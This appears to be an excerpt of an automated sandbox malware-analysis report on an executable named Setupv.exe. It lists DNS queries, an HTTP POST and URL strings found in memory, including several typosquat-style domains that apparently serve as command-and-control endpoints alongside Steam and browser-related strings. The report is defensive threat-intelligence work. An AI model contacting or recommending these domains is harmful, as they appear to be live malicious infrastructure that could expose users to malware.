        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com equals www.youtube.com (Youtube)
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com equals www.youtube.com (Youtube)
        Source: global trafficDNS traffic detected: DNS query: transdataa.digital
        Source: global trafficDNS traffic detected: DNS query: geographys.run
        Source: global trafficDNS traffic detected: DNS query: woodpeckersd.run
        Source: global trafficDNS traffic detected: DNS query: tropiscbs.live
        Source: global trafficDNS traffic detected: DNS query: cartograhphy.top
        Source: global trafficDNS traffic detected: DNS query: biosphxere.digital
        Source: global trafficDNS traffic detected: DNS query: topographky.top
        Source: global trafficDNS traffic detected: DNS query: climatologfy.top
        Source: global trafficDNS traffic detected: DNS query: vigorbridgoe.top
        Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
        Source: global trafficDNS traffic detected: DNS query: toptalentw.top
        Source: unknownHTTP traffic detected: POST /xwpa HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 57Host: transdataa.digital
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: Setupv.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: Setupv.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
        Source: Setupv.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
        Source: Setupv.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
        Source: Setupv.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: Setupv.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
        Source: Setupv.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
        Source: Setupv.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
        Source: Setupv.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
        Source: Setupv.exeString found in binary or memory: http://ocsp.comodoca.com0
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: Setupv.exeString found in binary or memory: http://ocsp.sectigo.com0
        Source: Setupv.exeString found in binary or memory: http://ocsp.sectigo.com0B
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowern:
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://biosphxere.digital/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://biosphxere.digital/tqoa
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://biosphxere.digital:443/tqoa
        Source: Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
        Source: Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cartograhphy.top/ixau3
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cartograhphy.top:443/ixauaD(
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatologfy.top/kbud
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://climatologfy.top:443/kbud
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
        Source: Setupv.exe, 00000000.00000002.1855754534.0000000003AA0000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=djUBMuXjwA
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=OftCDPJyLyB9&l=english&am
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=SYITZEvy19LV&l=en
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=iOnz
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=D1VziU1eIKI3&l=englis
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=QS5Fks-FfPa3&l=engli
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=Nvd4msBzMPzu&amp
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
        Source: Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=6Gx3WA4gUqN
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
        Source: Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
        Source: Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://geographys.run/H
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://geographys.run/m
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
        Source: Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
        Source: Setupv.exeString found in binary or memory: https://sectigo.com/CPS0
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
